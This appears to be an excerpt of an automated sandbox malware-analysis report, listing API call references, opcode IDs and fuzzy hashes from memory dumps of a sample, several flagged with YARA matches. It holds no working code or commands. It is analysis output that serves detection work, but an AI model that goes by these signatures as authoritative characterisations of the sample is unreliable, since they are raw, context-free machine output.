• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
• String ID:
• API String ID: 2250070497-0
• Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
• Instruction ID: 7dad9a61bbe8994f386adfb80ecf528b9569a665966d1cf9458ec8e64a54657c
• Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48011776400604AFC724EFA5C881EDAF7E9AF58310B008A2EA55687550DB71F954CBA0

APIs
• __EH_prolog3_GS.LIBCMT ref: 0040591C
  • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
• std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
• __Getcoll.LIBCPMT ref: 00405976
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
• Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
• Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
• Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99

APIs
• __EH_prolog3_GS.LIBCMT ref: 021050C7
  • Part of subcall function 0210BDA4: __EH_prolog3_GS.LIBCMT ref: 0210BDAB
• std::_Locinfo::_Locinfo.LIBCPMT ref: 02105112
• __Getcoll.LIBCPMT ref: 02105121
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105131
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
• Instruction ID: eee5c36f6c607d7f128cf0e702bf806602672be303152480f775c76bfd9186e5
• Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
• Instruction Fuzzy Hash: 91018C31D80308EFDB10EFA4C490B9CB7B6BF48310F10812AD045AB281CBF59944CF91

APIs
• __EH_prolog3_GS.LIBCMT ref: 02105B83
  • Part of subcall function 0210BDA4: __EH_prolog3_GS.LIBCMT ref: 0210BDAB
• std::_Locinfo::_Locinfo.LIBCPMT ref: 02105BCE
• __Getcoll.LIBCPMT ref: 02105BDD
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 02105BED
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
• Instruction ID: c996e50dc4be612a4932f8119d7cdc1669ec945078cdcfa7b7df22e4bf1dfa01
• Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
• Instruction Fuzzy Hash: 96014871990209EFDB14EFA4D490B9DBBB2BF48315F10852AD009AB280CBF99985CF91

APIs
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Compare_exchange_acquire_4std::_
• String ID:
• API String ID: 3973403980-0
• Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
• Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89

APIs
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C160
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C170
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C180
• std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0211C194
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Compare_exchange_acquire_4std::_
• String ID:
• API String ID: 3973403980-0
• Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction ID: 8d820c24acc374eb456cba99c8f15ed5df4dc53ae4c7599942ba66f06a7e51ca
• Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
• Instruction Fuzzy Hash: 4501B67A5C8149FBCF229F94DC018AE3B66AB65354F048433F92888470D732D671ABD3

APIs
• Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB
  • Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
  • Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980
• Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
• Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
• Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
• String ID:
• API String ID: 4284812201-0
• Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                                                  • Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515
                                                                                                                                                                                                                                                    • Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
                                                                                                                                                                                                                                                    • Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00413531
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00413555
                                                                                                                                                                                                                                                    • Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1674182817-0
                                                                                                                                                                                                                                                  • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0211377C
                                                                                                                                                                                                                                                    • Part of subcall function 02112B06: ___crtGetTimeFormatEx.LIBCMT ref: 02112B1C
                                                                                                                                                                                                                                                    • Part of subcall function 02112B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02112B3B
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 02113798
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021137AE
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021137BC
                                                                                                                                                                                                                                                    • Part of subcall function 021128DC: SetThreadPriority.KERNEL32(?,?), ref: 021128E8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1674182817-0
                                                                                                                                                                                                                                                  • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction ID: bd288b31d5e972b3c5039e386084366ebc06c808be959a3a2f89fc9fc969b5b3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF0A0B2A803257EE720B7755C0AFBB369C9F01750F60097AF915E7084EBB9D4448BB8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02111332
                                                                                                                                                                                                                                                    • Part of subcall function 02110BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02110BC6
                                                                                                                                                                                                                                                    • Part of subcall function 02110BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02110BE7
                                                                                                                                                                                                                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02111345
                                                                                                                                                                                                                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02111351
                                                                                                                                                                                                                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0211135A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4284812201-0
                                                                                                                                                                                                                                                  • Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                                                  • Instruction ID: c5542088139cd6c39b9e4d356b3cf1f4dac1e9538b62148d6d13cd9728c0bd4f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF02E31AD4308BF9F28BBB448615BEA2974F85320B080038DA116B3C0DFB18D41CAA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0211D078
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0211D09C
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0211D0AF
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0211D0BD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3657713681-0
                                                                                                                                                                                                                                                  • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                                  • Instruction ID: a0111b00a836d1dc05694c521358933309380576a9c7cb7d1718e7d866014a9c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F02E35980614AFC724FB54F841D5EB77F9ED0B14721817AD81513181EB72A90ACBA2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041262B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3803302727-0
                                                                                                                                                                                                                                                  • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 02105A79
                                                                                                                                                                                                                                                  • __Cnd_signal.LIBCPMT ref: 02105A85
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 02105A9A
                                                                                                                                                                                                                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02105AA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2059591211-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                                  • Instruction ID: 84d5450a10e65adaeb3503a332d8841c3aa62f839b18afaa1d18c2c86f59f499
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F0A032480701AFEB347B72D886B1A77A2AF00725F14482CD0895A8D0CFFAA8554E65
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0211285F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,02118820,?,?,?,?,00000000,?,00000000), ref: 0211286E
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112884
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02112892
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3803302727-0
                                                                                                                                                                                                                                                  • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction ID: a76a2f72e477ca486994031a60f313a94ba786dfa932fb32b5d480a511d1fb45
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0ED34A4021ABFCF10EFA4CD44EAF37B8AB00B01F600630B910E20E0DB75D6049BA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 0041231C
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041234E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 200240550-0
                                                                                                                                                                                                                                                  • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 02112583
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,02110D90), ref: 02112591
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021125A7
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 021125B5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 200240550-0
                                                                                                                                                                                                                                                  • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction ID: 14a9ac235ccb418f989956992e759e28d00d211dacbcb5c5a529ee316cb7bddb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE0DF61A803292EEB10B7758C62FBB369C9B00B45F940835BD14E50C2FBB9D50449A8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00423981
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004239A5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3735082963-0
                                                                                                                                                                                                                                                  • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                                  • Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02112949: TlsAlloc.KERNEL32(?,02110D90), ref: 0211294F
                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,02110D90), ref: 02123BD6
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 02123BE8
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02123BFE
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02123C0C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3735082963-0
APIs
• GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041255A
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
• String ID:
• API String ID: 3016159387-0
APIs
• GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02110D90), ref: 0211278E
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02110D90), ref: 0211279D
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021127B3
• __CxxThrowException@8.LIBVCRUNTIME ref: 021127C1
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
